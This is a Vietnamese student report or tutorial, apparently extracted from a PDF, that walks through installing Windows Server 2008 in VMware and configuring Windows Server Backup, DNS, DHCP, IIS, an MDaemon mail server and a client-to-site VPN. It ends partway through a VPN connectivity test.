Tùy chọn cài đặt mới Server Core của Windows Server 2008 cho phép cài đặt
các vai trò máy chủ chỉ với những thành phần và hệ thống phụ cần thiết mà
không cần giao diện người dùng. Việc có ít hơn các vai trò và đặc tính đồng
nghĩa với việc giảm thiểu công việc cho ổ đĩa và dịch vụ, đồng thời giảm bớt
các bề mặt tấn công. Sản phẩm cũng cho phép nhân viên CNTT xây dựng đặc
tả tùy theo các vai trò máy chủ cần hỗ trợ.
Tích hợp Công nghệ Ảo hóa (Virtualization)
Windows Server Hyper-V, công nghệ ảo hóa thế hệ kế tiếp dành cho máy chủ
trên nền hypervisor, cho phép tận dụng tối đa các khoản đầu tư vào phần cứng
máy chủ bằng cách hợp nhất nhiều vai trò máy chủ thành các máy ảo riêng
biệt chạy trên một máy vật lý duy nhất. Cũng có thể chạy song song nhiều hệ
điều hành như Windows, Linux và các hệ điều hành khác một cách hiệu quả
trên một máy chủ duy nhất. Với Hyper – V và các chính sách cấp phép đơn

12

giản, giờ đây có thể tận dụng lợi thế của các khoản tiết kiệm chi phí và ảo hóa
một cách dễ dàng hơn bao giờ hết.

Hình 1.3 Mô hình ảo hóa
Nhờ các công nghệ truy cập ứng dụng tập trung của Windows Server 2008,
các ứng dụng cũng được ảo hóa một cách hiệu quả. Terminal Services
Gateway và Terminal Services RemoteApp cho phép dễ dàng truy cập từ xa
tới các chương trình chuẩn hoạt động trên nền Windows từ bất cứ vị trí nào
bằng cách chạy chương trình trên một máy chủ đầu cuối thay vì chạy trực tiếp
trên một máy trạm mà không cần tới một mạng riêng ảo (VPN) phức tạp.
Được xây dựng phục vụ Web
Windows Server 2008 xuất hiện với Internet Information Services 7.0 (IIS
7.0), một nền tảng máy chủ Web dễ sử dụng, tăng cường bảo mật để phát triển
và lưu trữ các ứng dụng và dịch vụ Web một cách tin cậy. Đặc tính nâng cao
quan trọng đối với nền tảng Web IIS 7.0 bao gồm một kiến trúc được thành
phần hóa để đem tới khả năng linh hoạt và kiểm soát cao hơn. II.7.0 cũng
cung cấp các khả năng quản lý được đơn giản hóa, khả năng khắc phục sự cố
mạnh mẽ, mang tính chẩn đoán giúp tiết kiệm thời gian và khả năng mở rộng
toàn diện.
Internet Information Server IIS 7.0 cùng với .NET Framework 3.0 cung cấp
một nền tảng toàn diện để xây dựng các ứng dụng kết nối người dùng và dữ
liệu, cho phép họ hình ảnh hóa, chia sẻ và thao tác thông tin. Thêm vào đó, IIS
7.0 còn đóng vai trò trung tâm trong việc hợp nhất các công nghệ nền tảng
Web của Microsoft – ASP.NET, các dịch vụ Web của Windows
Communication Foudation, và Windows Sharepoint Services.

13

Hình 1.4 Giao diện Internet Information Services (IIS) Manager

Bảo mật cao
Windows Server 2008 là hệ điều hành Windows Server bảo mật nhất từ trước
đến giờ. Hệ điều hành này đã được củng cố chắc chắn để giúp bảo vệ chống
lại hỏng hóc. Một số công nghệ mới giúp ngăn chặn các kết nối bất hợp pháp
tới các mạng, máy chủ, dữ liệu của bạn và các tài khoản người dùng. Chức
năng Network Access Protection (NAP) giúp đảm bảo rằng những máy tính
nào muốn kết nối với mạng của bạn đều phải tuân thủ chính sách bảo mật của
tổ chức. Việc tích hợp công nghệ và nhiều tính năng nâng cao khiến các dịch
vụ Active Directory trở thành một giải pháp IDA (Identity and Access - Nhận
dạng và Truy cập) tích hợp, hợp nhất và mạnh mẽ. Thêm vào đó, Read-Only
Domain Controller (RODC) và Mã hóa ổ đĩa bằng BitLocker cho phép bạn
triển khai cơ sở dữ liệu AD một cách bảo mật hơn trên khắp các khu vực của
văn phòng chi nhánh.
Tính toán hiệu năng cao
Lợi ích và các khoản tiết kiệm chi phí của Windows Server 2008 mở rộng tới
Windows HPC Server 2008 để phục vụ cho môi trường tính toán hiệu năng
cao (HPC) của bạn. Windows HPC Server 2008 được xây dựng trên nền
Windows Server 2008, công nghệ 64 bit và có thể mở rộng một cách hiệu quả
tới hàng nghìn lõi xử lý với tính năng có sẵn để cải thiện hiệu suất, và giảm
tính phức tạp của môi trường HPC. Windows HPC Server 2008 cho phép triển
khai rộng rãi hơn bằng cách đem tới cho người dùng cuối những trải nghiệm
phong phú và tích hợp, mở rộng từ ứng dụng máy bàn tới các cụm máy, và
14

bao gồm một bộ trọn vẹn các công cụ triển khai, quản trị và giám sát. Các
công cụ này dễ triển khai, quản lý và tích hợp với hạ tầng CNTT hiện có của
bạn.
2.3 Các công nghệ được tiếp xúc, quá trình làm việc và các kiến thức
2.3.1 Làm việc với Windows Server 2008 trên môi trường máy ảo VMWare

Hình 2.1 VMware Workstation 10

VMWare WorkStation là một phần mềm giúp tạo máy ảo.
-

Chạy các ứng dụng trên nhiều hệ điều hành bao gồm cả Linux, Windows và
nhiều hơn nữa cùng một lúc trên cùng một máy tính mà không cần khởi động
lại.

-

Giúp đánh giá và kiểm tra hệ điều hành mới, các ứng dụng và các bản vá lỗi
trong một môi trường bị cô lập.

-

Củng cố nhiều máy tính chạy các máy chủ web, máy chủ cơ sở dữ liệu, vv vào
một máy tính duy nhất.

15

-

Xây dựng kiến trúc tham khảo để đánh giá trước khi triển khai vào sản xuất.
Như việc trong khi thực hành về máy Windows Server 2008 trên máy ảo để
nghiên cứu trước khi triển khai trên hệ thống thật.

2.3.1.1.1 Cài đặt và cấu hình máy chủ Windows Server 2008
Xácđịnh yêu cầu phần cứng:

Hình 2.3.1.1.1 Cấu hình cài đặt Windows Server 2008.
Các bước cài đặt Windows Server 2008 (cài đặt trên môi trường
máyảoVMware Workstation)
Mở máyảoVMware
Workstation

16

Click File  New
Vitual Machine…

Xuất

hiện

hộp

thoại New Vitual
Machine

Wizard

 Click Next>.

17

Click Installer disc
image file (iso) nếu
có file ISO và click
Browse..  chọn
đường dẫn đến nơi
chưa file ISO.Nếu
cóđĩa Win Server
2008

thì

chon

Installer disc.

Nhập

Windows

Product key hoặcđể
trống

rồi

Click

Next>

18

Chọn Location nơi
Windows Server sẽ
càiđặt vào nơi nào
trong ổđĩa.
Click Next>

Nhập

dung

lượngổđĩa

vàoô

maximum disk size
khuyến nghị là 40
GB
Click Next>

19

Click Finish để tiến
hành càiđặt.

Chọn

ngôn

ngữ

càiđặt

và

click

Next.

20

Bấm

nút Install

now để bắt đầu cài
đặt.

Nhập product key
của

phiên

Windows
2008
Nếu

bản
Server

Enterprise
chưa

muốn

kích hoạt Windows
vì mục đích kiểm
tra hoặc dùng thử,
bạn bỏ dấu chọn ở
mục Automaticall
yactivate
Windows

then

I’m online và bấm
nút Next.

21

Chọn

kiểu

cài

đặt Windows
Server

2008

Enterprise

(Full

Installation).

Chọn I accept the
license

terms và

bấm nút Next.

22

Chọn

Custom

(advanced)

Chọn

phân

vùngổđĩa cần cài
Windows
2008

và

Server
click

Next.

23

Chờ cho quá trình
càiđặt hoàn tất.

Trong

lần

đăng

nhập đầu tiên, hệ
thống yêu cầu bạn
thay đổi mật khẩu
ngay lập tức

24

Bạn

bấm OK,

nhập mật khẩu mới
và

bấm

phím Enter.
Và như vậy bạn đã
cài

đặt

Windows

hoàn

tất

Server

2008.

2.3.1.1.2 Khởi tạo cấu hình lần đầu tiên cho Windows Server 2008
Ngay khi bạn đăng nhập thành công, hệ thống hiển thị màn hình yêu cầu
thực hiện các thao tác cầu hình ban đầu cho Windows (Initial Configuration
Tasks). Trong đó bao gồm :
• Set time zone : thiết lập time zone cho server.
• Configure networking : thiết lập các thông số kết nối mạng bằng cách mở
cửa sổ Network Connections và tương tác với các kết nối hiện có trên server.
• Provide computer name and domain : mở hộp hội thoại System
Properties để thay đổi tên máy tính và kết nối vào domain.
• Enable automatic updating and feedback : kích hoạt tính năng này để cho
phép bạn cấu hình Windows automatic updating, Windows Error Reporting và
Customer Experience Improvement Program.

25

Hình 2.3.1.1.1Màn hình Initial Configuration Task

Hình 2.3.1.1.2 Kích hoạt tính năng automatic updating and feedback

26

Cài đặt Server Manager
Ngay khi bạn kết thúc các bước cấu hình và đóng màn hình Initial
Configuration Tasks, màn hìnhServer Manager tự động được kích hoạt. Tại
đây, bạn có thể thực hiện hầu hết các thao tác cấu hình trên server.

Hình 2.3.1.1.3Màn hình chính của Server Manager
Server Manager là một công cụ che phép bạn thực hiện hầu hết các thao tác
quản trị trên Windows Server 2008, từ các dịch vụ server như Active
Directory, DNS, DHCP, … đến các thành phần của hệ thống như .NET
Framework 3.0, Network Load Balancing, Group Policy Management, … ; từ
hệ thống firewall, quản lý user và group đến các dịch vụ sao lưu hệ thống,
quản lý đĩa…
Có thể nói rằng công cụ này là kết quả của sự kết hợp hòan hảo các công cụ
quản lý trên những phiên bản Windows trước đó.

27

Theo mặc định, Server Manager sẽ tự động khởi động ngay sau khi bạn
đăng nhập vào hệ thống. Nếu đã đóng cửa sổ này, bạn có thể thực hiện một
trong những cách sau để mở lại :
• Kích chuột phải vào biểu tượng Computer trên desktop, chọn Manage.
Các thành phần trong Server Manager
Khi làm việc với Server Manager, bạn sẽ tương tác với 5 thành phần chính :
• Roles cho phép bổ sung và loại bỏ các dịch vụ của server. Tại đây bạn
cũng có thể quản lý chi tiết dữ liệu tương ứng với mỗi dịch vụ.
• Features cho phép bổ sung và loại bỏ các thành phần trên Windows
Server 2008. Chức năng này tương tự như Add/Remove Windows
Components trong các phiên bản Windows trước đó.
• Diagnostics tích hợp các thành phần Event Viewer, Reliability and
Performance và Device Manager.
• Configuration bao gồm các công cụ Local Users And Group, Task
Scheduler, Windows Firewall with Advanced Security, WMI
Control và Services. WMI Control được dùng để quản lý các dịch vụ
Windows Management Instrumentation.
• Storage tích hợp hai công cụ Windows Server Backup và Disk
Management.

28

Hình 2.3.1.1.4 Quản lý chi tiết trên Active Directory Users and Computer.
Quản lý các dịch vụ Server (Roles)
Để mở các cửa sổ quản lý các dịch vụ server, bạn chọn mục Roles ở khung
bên trái của màn hình Server Manager. Trên Windows Server 2008 nói
chung, bạn có thể triển khai tất cả 16 dịch vụ server, từ Active Directory
Domain Services đến các server như DHCP, DNS, Web, …
Lưu ý : ngoài 16 dịch vụ server có mặt trên tất cả các phiên bản Windows
Server 2008, Microsoft còn cung cấp một dịch vụ server nữa, đó là Hyper-V.
Hyper-V là công nghệ ảo hóa chỉ chạy trên các nền tảng hệ điều hành 64-bit.
Để cài đặt một dịch vụ server bất kỳ, bạn đánh dấu chọn vào ô tương ứng
trên hộp thoại Select Server Roles. Tiếp theo, bấm nút Install để bắt đầu.
Trong tiến trình cài đặt, tùy theo đặc điểm riêng của từng dịch vụ server, bạn
sẽ điền thông tin và thực hiện các thao tác cần thiết để hoàn thành tiến trình.

29

Hình 2.3.1.1.5 Các dịch vụ Server trên Windows Server 2008
Quản lý các thành phần (Features)
Để mở cửa sổ quản lý các thành phần, bạn chọn mục Features ở khung bên
trái của màn hình Server Manager. Trên Windows Server 2008 bạn có thể
tương tác với tất cả 35 thành phần.
Để cài đặt một thành phần bất kỳ, bạn đánh dấu chọn vào ô tương ứng trên
hộp thoại Select Features. Tiếp theo, bấm nút Install để bắt đầu. Trong tiến
trình cài đặt, tùy theo đặc điểm riêng của từng thành phần, bạn sẽ điền thông
tin và thực hiện các thao tác cần thiết để hoàn thành tiến trình.

30

Hình 2.7 :Các thành phần Feature trên Windows Server 2008.
Sau khi cài đặt xong, thông tin và trạng thái của các thành phần sẽ hiển thị
trong khung Features Summary thuộc cửa sổ Server Manager. Tại đây, bạn
cũng có thể thực hiện các thao tác bổ sung và loại bỏ các thành phần này.
Quản lý không gian lưu trữ và sao lưu dữ liệu (Storage) và Backup Server.
Mặc định, Windows Server Backup chưa sẵn dùng trên Windows Server 2008.
Do đó, bạn cần bổ sung thành phần này vào hệ thống trước khi sử dụng. Các
bước thực hiện như sau :
Trong cửa sổ Server
Manager,
ở
khung Feature
Summary,
bạn
chọn Add Features.

31

Trong
màn
hình Select Features,
đánh
dấu
chọn
mục Windows
Server
Backup
Features và
bấm
nút Next.

Trong
màn
hình Confirm
Insatallation
Selection, bạn bấm
nút Install để bắt đầu
cài đặt.

Trong
màn
hình Installation
Results, bạn bấm
nút Close để
hoàn
thành thao tác bổ
sung thành phần cần
thiết vào Windows
Server 2008.

32

Kích chuột phải lênh
mục Windows
Server
Backup trong Storag
e,
chọn Backup
Schedule.

Trong
màn
hình Getting started,
bấm nút Next.

33

Trong
màn
hình Select backup
items, bạn chọn ổ đĩa
chứa hệ điều hành
của
mình,
trong
trường hợp này là ổ
đĩa C: và bấm
nút Next

Trong
màn
hình Specify backup
time, bạn chọn số lần
và thời điểm sao lưu.
Ở đây, chúng ta chọn
sao lưu vào lúc 10:00
tối mổi ngày (Once a
day). Sau khi chọn
xong,
bạn
bấm
nút Next.
Trong
màn
hình Select
destination disk, bạn
đánh dấu chọn vào ổ
đĩa mà mình sẽ sao
lưu đến và bấm
nút Next

34

Trong
hình Label
destination
bấm nút Next.

màn
disk,

Trong
màn
hình Summary, bạn
bấm
nút Finish để
hoàn thành thao tác
tạo lịch trình sao lưu
ổ đĩa

2.3.1.1.3 Cài đặt dịch vụ DNS
DNS (Domain Name System) Server là máy chủ được dùng để phân
giải domain thành địa chỉ IP và ngược lại. Ví dụ: athena.edu.vn là
173.214.177.90
Về cách thức hoạt động, DNS Server lưu trữ một cơ sở dữ liệu bao
gồm các bản ghi DNS và dịch vụ lắng nghe các yêu cầu.Khi máy
client gửi yêu cầu phân giải đến, DNS Server tiến hành tra cứu trong
cơ sở dữ liệu và gửi kết quả tương ứng về máy client.

35

Tại cửa sổ Server
Manager, chọn mục
Roles, chọn mục Add
Roles.

Chọn DNS và click Next.

36

Click Next

Click Install để cài đặt
DNS

37

Quá trình cài đặt hoàn
tất.

Để cấu hình DNS Server
vào
menu StartProgramsA
dministrative
Tools,
chọnDNS.
Forward
Lookup
Zones, chọn New Zone.

38

Trong
màn
hình
Welcome, bấm nút Next.

Trong màn hình Zone
Type, bạn chọn Primary
zone để cấu hình DNS
Server chính. Sau đó,
bấm nútNext.

39

Name, bạn nhập tên zone
vào mục Zone name, ví
dụ thuvien-it.net. Sau đó,
bấm nút Next

Trong màn hình Zonle
File, bạn chấp nhận giá
trị mặc định và bấm
nút Next.

Để mặc định và click
Next

40

Trong
màn
hình
Completing, bạn xem lại
thông tin về DNS Server
và bấm nút Finish để
hoàn thành thao tác cấu
hình DNS.

Với các bước vừa thực
hiện ở trên, bạn đã cấu
hình
chức
năng forward, tiếp theo,
bạn sẽ cấu hình chức
năng reverse. Reverse
Lookup
Zones,
chọn New Zone

41

Trong
màn
hình
Welcome, bấm nút Next.
Type,
bạn
chọn Primary.Sau đó,
bấm nút Next.

Trong màn hình Reverse
Lookup Zone Name, bạn
chọn thể loại địa chỉ IP
là Ipv4

42

Tiếp
theo,
bạn
điền network
IP của
mình và bấm nút Next.

File, bạn chấp nhận giá
trị mặc định nhằm tạo ra
một file dùng để lưu các
bản ghi DNS cho zone
này, bấm nút Next.

43

Trong
màn
hình
Dynamic Update, bạn
chọn allow dynamic
updates và
bấm
nút Next

Trong
màn
hình
Completing, bạn bấm
nút Finish để hòan thành
thao tác cấu hình chức
năng reverse trên DNS
Server chính.
Cấu hình host đại diện
dùng để phân giải tên ra
số.

44

Mục name nhập www và
mục IP address nhập địa
chỉ Ip máy Server. Và
Click Add host.

Để kiểm tra và start 
cmd
và
gõ
lệnh
nslookup.

Tạo Pointer đại diện tên
1 host có sẵn để phân
giải tên ra IP.

45

Trong hộp thoại New
Resource Record, bạn
nhập địa chỉ IP vào mục
Host IP address, đồng
thời nhập tên máy vào
mục Host name. Nếu
không nhớ, bạn bấm
nút Browse để tìm ra tên
máy cần thiết. Sau khi
điền xong, bấm nút OK.

Sau khi Click Browse…
Click OK.

2.3.1.1.4 Dịch Vụ DHCP
DHCP (Dynamic Host Configuration Protocol) Server là máy chủ được
dùng để cấp phát địa chỉ IP động cho các máy trạm trong một hệ thống
mạng. Trên các phiên bản trước như Windows 2000 Server hay
Windows Server 2003, bạn đã quen thuộc với chức năng này.
Về cách thức hoạt động, DHCP Server sử dụng dịch vụ cùng tên để
lắng nghe yêu cầu xin cấp phát địa chỉ IP được gởi từ máy trạm. Sau
46

khi nhận yêu cầu, DHCP Server sẽ chọn ra một địa chỉ IP trong dãy địa
chỉ của mình và gời về cho máy trạm. Đồng thời, DHCP Server cũng
gởi đến máy trạm các thông tin liên quan đến địa chỉ IP như subnet
mask, địa chỉ IP của các DNS Server, default gateway, …Đối với
Windows Server 2008, cách thức cài đặt và cấu hình được mô tả chi tiết
ngay sau đây.
Mở cửa sổ Server
Manager.
Trong
khung Roles
Summary ở
bên
phải,
bạn
bấm
nút Add Roles

47

Chọn dịch vụ DHCP
và click Next

Click Next

48

Chọn card mạng
lắng nghe yêu cầu
xin cấp DHCP và
click Next>

Nhập thông tin về
domain và các DNS
Server sau đó click
Next.

49

Trong màn hình
Specify Ipv4 WINS
Server Settings, bạn
chọn WINS is not
required
for
applications on this
network. Sau đó
click Next.

Trong màn hình Add
or
Edit
DHCP
Scopes,
bấm
nút Add. Và điền
các thông tin cần
thiết. và click OK.

50

Sau khi hoàn thành
việc định nghĩa các
dãy địa chỉ, bạn bấm
nút Next trong màn
hình Add or Edit
DHCP Scopes

Trong màn hình
Configure DHCPv6
Stateless Mode, bạn
chọn Disable
DHCPv6 stateless
mode
for
this
server.

51

Trong màn hình
Authorize
DHCP
Server, bạn chọn tài
khoản dùng để cấp
phép (authorizing)
cho DHCP Server
trong
Active
Directory Domain
Services. Sau đó,
bấm nút Next.

Trong màn hình
Confirm Installation
Selections, bạn xem
lại các thiết lập vừa
thực hiện và bấm
nútInstall để bắt đầu
cài đặt.
Như vậy chúng ta đã
hoàn tất quá trình
cài đặt và cấu hình
dịch vụ DHCP.

52

Đến đây, DHCP đã
sẵn sàng cung cấp
địa chỉ IP cho các
máy trạm trong hệ
thống mạng. Nếu
muốn hiệu chỉnh các
thông số cấu hình,
bạn thực hiện theo
các bước sau:vào
menu Start/Progra
ms/Administrative
Tools, chọn DHCP.

Mở rộng mục IPv4,
kích chuột phải vào
dòng Scope
[172.16.0.0],
chọn Properties

53

Trên tab General,
bạn có thể thay đổi
các giá trị Scope
name, Start
IP
address, End
IP
address, giới hạn
thời gian địa chỉ IP
tồn tại trên máy
trạm.

Để
thay
đổi
gateway, bạn kích
chuột
phải
lên
mục 003
Router trong Scope
Options,
chọnProperties.

54

Thay đổi giá trị
gateway bằng các
chức
năng Add và Remo
ve.

Để thay đổi địa chỉ
các DNS Server, bạn
kích chuột phải lên
mục 006
DNS
Servers trong Serve
r
Options,
chọn Properties.

55

Thay đổi địa chỉ của
DNS Server bằng
chức
năng Add và Remo
ve.

Để thay đổi tên
miền, bạn kích chuột
phải lên mục 015
DNS
Domain
Name trong Server
Options,
chọn Properties.

56

Nhập tên miền mới
vào
mục String
value.

Cấu hình địa chỉ IP
động trên máy trạm
bạn mở cửa sổ
Network
Connections và truy
cập vào hộp thoại
Internet
Protocol
(TCP/IP) Properties.
Tại
đây,
bạn
chọn Obtain an IP
address
automatically và
Obtain DNS server
address
automatically. Sau
đó, bấm nút OK

57

Trên máy trạm lệnh
xin cấp địa chỉ
DHCP bằng cách
vào Start  Run 
gõ cmd  enter.

Gõ lệnh
/renew.

ipconfig

Để xin trả lại địa chỉ
IP mà DHCP đã cấp
gõ lệnh ipconfig /
release.
Như vậy chúng ta đã hoàn thành việc cấp địa chỉ IP động bằng dịch vụ
DHCP.

2.3.1.1.5 Cấu hình Web Server IIS.

58

Mở cửa sổ Server
Manager.
Trong
khung Roles
Summary ở bên
phải, bạn bấm Add
Roles.

Trong màn hình
Select
Server
Roles, chọn Web
Server (IIS)

59

Trong hộp thoại
Add
features
required for Web
Server (IIS), bạn
bấm
nút Add
Required
Featuresđể
bổ
sung các thành
phần liên quan đến
Web Server.
Trong màn hình
Select
Server
Roles,
bấm
nút Next.

60

Chọn lựa các thành
phần bổ sung vào
Web Server.

Trong màn
Confirm
Installation
Selections,
xem lại các
lập vừa thực
và
nútInstall để
đầu cài đặt.

hình
bạn
thiết
hiện
bấm
bắt

61

Sau khi cài đặt
hoàn tất. Khi IIS
Manager xuất hiện,
bạn sẽ bắt gặp
ngay trang web đầu
tiên (IIS Start
Page). Tại đây, bạn
sẽ tìm thấy thông
tin về các kết nối
đến
các
Web
Server mình đã
quản lý trong thời
gian gần với hiện
tại.
Trong màn hình
Specify
Server
Connection
Details, bạn nhập
địa chỉ IP của Web
Server cần quản lý
vào
mục Server
name và
bấm
nút Next.

62

Trong màn hình
Specify
a
Connection Name,
bạn nhập tên kết
nối
và
bấm
nút Finish.

Để thay đổi các
thông số cấu hình
trên Web Server,
bạn kích chọn tên
kết nối tương ứng
với Web Server ở
khung bên trái, sau
đó chọn mục cần
cầu hình ở khung
chính giữa.

63

Để kiểm tra Web
Server sau khi đã
cài đặt, bạn mở
trình duyệt và gõ
địa
chỉ http://localhos
t. Nếu màn hình
IIS 7 xuất hiện như
hình bên dưới, thao
tác cài đặt và cấu
hình Web Server
của bạn đã thành
công.

Xuất bản một
website Mở cửa sổ
Internet
Information
Service
(IIS)
Manager. Kích
chuột phải lên
mục Sites ở khung
bên trái, chọn Add
Web Site.

64

Trong hộp thoại
Add Web Site, bạn
điền thông tin :
Tên của website
vào mục Site name
Nhập đường dẫn
đến thư mục chứa
mã nguồn của
website
vào
mục Physical
path hoặc bấm vào
nút ba chấm (…)
để định đường dẫn.
Nếu xuất bản
website với mã
nguồn chứa ở một
máy tính khác, bạn
cần
bấm
vào
nút Connect as và
chỉ định tài khoản
dùng để truy cập
thư mục ở xa
này.Nếu xuất bản
nhiều website, bạn
cần nhập tên truy
cập chính xác của
các website vào
mục Host name.

65

Ngay sau đó,
một thông báo xuất
hiện, cho biết cổng
80 đã được một
website khác sử
dụng
(thông
thường là Default
Web Site) Trong
trường hợp này,
bạn
cần
kích
chọn Default Web
Site và
bấm
nút Stop ở khung
bên phải để ngưng
trạng thái hoạt
động của website
này. Đồng thời,
bạn chọn website
của mình và bấm
nút Start ở khung
bên phải để kích
hoạt trạng thái hoạt
động cho website
Đến nay, bạn đã
hoàn thành thao tác
xuất
bản
một
website. Nếu muốn
kiểm tra, bạn mở
trình duyệt và gõ
địa
chỉ
http://localhost.
Ngay sau đó, nội
dung website của
bạn sẽ xuất hiện.

2.3.1.1.6 Mail Server
66

Hiện nay có rất nhiều phần mềm quản lý Mail trên Server như: Mail
Exchange,… nhưng MDaemon Mail Server: là 1 trong những giải pháp
hệ thống mail server toàn diện nhất hiện nay dành cho các công ty,
doanh nghiệp với quy mô khác nhau. MDaemon Mail Server hiện có 3
phiên bản: Standard, Pro và Free. Sau đây là một số điểm đáng chú ý
của chương trình.

Hình 2.3.1.1.6.1 Giao diện Mdeamon.
Màn hình hiển thị chính của MDaemon (Graphical User Interface - GUI) đưa
ra thông tin quan trọng về các nguồn tài nguyên, các giao dịch, số liệu thống
kê, luồng dữ liệu đang trong trạng thái hoạt động (active) và các mail đang
trong quá trình chờ đợi (queued) để được xử lý. Bên cạnh đó, còn có sự lựa
chọn cho người dung chuyển đổi trạng thái activating/deactivating đối với các
hệ thống máy chủ khác nhau có sử dụng MDaemon. Cửa sổ bên phải hiển thị
đầy đủ thông tin về kết nối dữ liệu đầu vào và ra (incoming và outgoing) đang
được thực hiện.

67

Sau đây là quá trình cài đặt 1 Mail Server trên phần mềm Mdeamon.
Trước tiên, bạn
tải phiên bản
MDaemon Mail
Server mới nhất
và bắt đầu quá
trình
cài
đặt.Bấm "Next"
để tiếp tục.

Đánh dấu vào ô
"I have read and
I agree with all
the terms of this
license
agreement"

68

Chọn đường dẫn
lưu
trữ
của
chương
trình,
mặc định sẽ là ổ
C hệ thống (ổ đĩa
có cài hệ điều
hành Microsoft
Windows).

Lựa chọn phiên
bản cài đặt, nếu
bạn có key đăng
ký thì nhập vào ô
phía dưới. Ở ví
dụ sử dụng là
phiên bản free
hoặc miễn phí 30
ngày của phiên
bản Pro.

Tùy chọn các
thông tim phù
hợp với vị trí, ở
đây là VietNam

69

Điền đúng thông
tin về quy mô của
tổ chức hoặc
công ty.

Sau khi hoàn tất
các bước trên,
chọn "Next" để
bắt đầu cài đặt.

Chờ đợi cho quá
trình cài đặt hoàn
tất.

70

Điền tên Domain
chính xác ví
dụ:nguyendinhdu
y.tk

Điền địa chỉ DNS
chính (Primary)
và dự phòng
(Backup)

Giữ nguyên lựa
chọn "Setup
MDaemon as a
system service"

71

Bấm "Finish" để
kết thúc quá trình
cài đặt và cấu
hình ban đầu, bắt
đầu sử dụng

Giao diện sau khi
cài đặt thành
công.

72

Tạo 1 tài khoảng
mới vào Account

New
Account…

Nhập thông tin
vào
Email
address và Email
Password. Click
OK để tạo tài
khoảng Email.

73

Vào
Mail.

OutLook

Cấu hình Out
Look mail để
quán lý mail cho
tài
khoảng
test@nguyendinh
duy.tk. Nhập tên
hiện
thị
vào
Display name và
click Next>

74

Nhập địa chỉ
Email và Click
Next>

Nhập địa chỉ IP
vào 2 ô Incoming
và Outgoing và
click Next.

75

Nhập tên tài
khoảng và mật
khẩu. Click Next.

Click Finish để
hoàn tất cấu hình
quản lý mail cho
tài khoảng test.

76

Tạo mail để kiểm
ra việc gửi mail
từ tài khoảng test
đến 1 e mail bất
kỳ.

Vào mail được
gửi và kiểm tra
Mail.

Xem mail tu tài
khoảng
test@nguyendinh
duy.tk

77

Trả lời lại Mail
của tài khoảng
test@nguyendinh
duy.tk

Vào lại mail của
tài
khoảng
test@nguyendinh
duy.tk và đã nhận
được hồi âm.

Như vậy chúng ta đã hoàn thành việc cài đặt và quản lý 1 mail Server trên
phần mềm Mdeamon.

2.3.1.1.7 Kết nối VPN

78

Việc triển khai một mạng riêng ảo có nhiều dịch vụ và chức năng cần
phải làm việc cùng nhau một cách trôi chảy và dễ dàng, vì vậy những
người dùng truy cập từ xa có thể được định danh và xác thực; các được
hầm có thể được tạo lập, duy trì và quản lý cho hàng trăm người dùng;
việc định tuyến có thể kiểm soát tất cả luồng lưu lượng qua Gateway,
và trong khi tất các những thứ này đang tiếp tục, hiệu suất và sự an toàn
cần được duy trì.
Các thành phầm phải được cài đặt để tạo ra một hệ thống mạng riêng
ảo hoạt động đúng đắn. Để đưa ra quyết định đúng lúc triển khai các
kết nối mạng riêng ảo truy cập từ xa, ta phải hiểu tất cả các thành phần
liên quan. Trong chương "Tổng quan về mạng riêng ảo" chúng ta đã
thảo luận về kiểu kịch bản mạng riêng ảo truy cập từ xa, trong đó nhiều
Client truy cập tới một cổng kết nối đơn vào các tài nguyên trong mạng
Intranet. Trong phần này ta sẽ mô tả các thành phần của các kết nối
mạng riêng ảo truy cập từ xa và các quan điểm thiết kế gắn với chúng.
Mô hình VPN Client to Site:

Hình 2.3.1.1.7.1 Mô hình VPN Client to Site.
Để cấu hình và thiết lập kết nối VPN Client to Site trải qua các bước sau:

79

Đăng nhập
vào
máy
chủ ảo VPS
với quyền
quản trị.

Vào Start

Programs

Administrat
ive Tools
 Routing
and remote
access để
cấu hình.

80

Giao diện
Routing
and remote
Access

Click chuột
phải
vào
server bà
chọn
Configure
and Enable
Routing
and Remote
Access.

81

Cửa
sổ
Routing
and remote
access
server setup
wizard hiện
lên ta Click
Next>

Ta
chọn
Custom
Configutati
on.

82

Đánh dấu
vào 2 mục
VPN access
và mục Lan
routing.
Click
Next>

Click
Finish để
tiến hành
kích hoạt.

83

Click Yes
để bắt đầu.

Routing
and Remote
Acces đã
sẵn sàng.

Để
cấu
hình dãi địa
chỉ IP khi
các
máy
Client truy
cập
vào
VPN
sẽ
được cấp ta
right click
vào Server
và
chọn
Properties.

84

Chuyễn
sang tab IP
và
chọn
Static
andress
pool.

Nhập dãy
địa chỉ bắt
đầu
vào
Start
IP
address và
dãy địa chỉ
kết
thúc
vvào End
IP address
và
Click
OK để chấp
nhận.

85

Như
vậy
chúng ta đã
hoàn
tất
cấu
hình
cho phép
có thể truy
cập VPN
vào
máy
chủ. Tiếp
theo ta cần
tào
tài
khoảng để
có thể đăng
nhập vào
máy chủ.
Bằng cách
Right click
vào
My
conputer và
chọn
Manage.
Tiếp theo ta
vào System
tools

Local Users
and Groups
 Users

86

Right Click
vào User và
chọn New
User…

Tạo 1 user
và điền tên
user
vào
mục User
name
và
mật khẩu
vào
ô
Password
và nhập lại
mật khẩu
vào
ô
Confim
password.
Click
Create để
tạo user.

87

Tượng tự
tạo 1 user
khác có tên
là client 2

Để User có
quyền truy
cập VPN ta
right click
vào
tài
khoảng cần
cấp quyền
và
chọn
Properties

88

Sang
tab
Dial-in và
chọn Allow
Access để
cấp quyền
và
click
OK
để
hoàn
tất.
Tương tự
cho user có
tên
là
Client2.

Chuẩn bị 2
máy
ảo.
Trên máy
ảo thứ 1 ta
vào Start
Settings
 Network
Connection
s.

89

Click vào
Create
a
new
Connection
.

Hộp thoại
New
Connection
Wizard
hiện lên và
click Next>

90

Chọn mục
Connect to
the
Network at
my
workplace
và
click
Next>

Click chọn
Virual
Private
Network
connection
và
chọn
Next>

91

Nhập tên
công ty vào
ô company
name
và
click Next>

Click Do
not dial the
intial
connection
và
click
Next>

92

Nhập địa
chỉ IP của
máy
chủ
hoặc
tên
domain đã
đăng ký và
click Next>

Chọn
Anyone’s
use và click
Next>

93

Chọn add a
shortcut to
this
connection
to
my
desktop để
thuận tiện
cho lần kết
nối sau và
click Finish
để hoàn tất.

Màn hình
đăng nhập
hiện lên ta
nhập
tên
User
và
Password
cần kết nối
và
click
Connect.

94

Sau khi kết
nối thành
công
thì
bên
góc
phải màn
hình sẽ có
kết
nối
mạng thứ 2.
Double
click vào
biểu tượng
mạng kết
nối

chuyển
sang
tab
Details để
xem
chi
tiết.

95

Các bước
thực hiện
tương
tự
cho Client
2. Và kết
quả
cho
Client
2
như sau.

Trên
Client1 tiến
hành ping
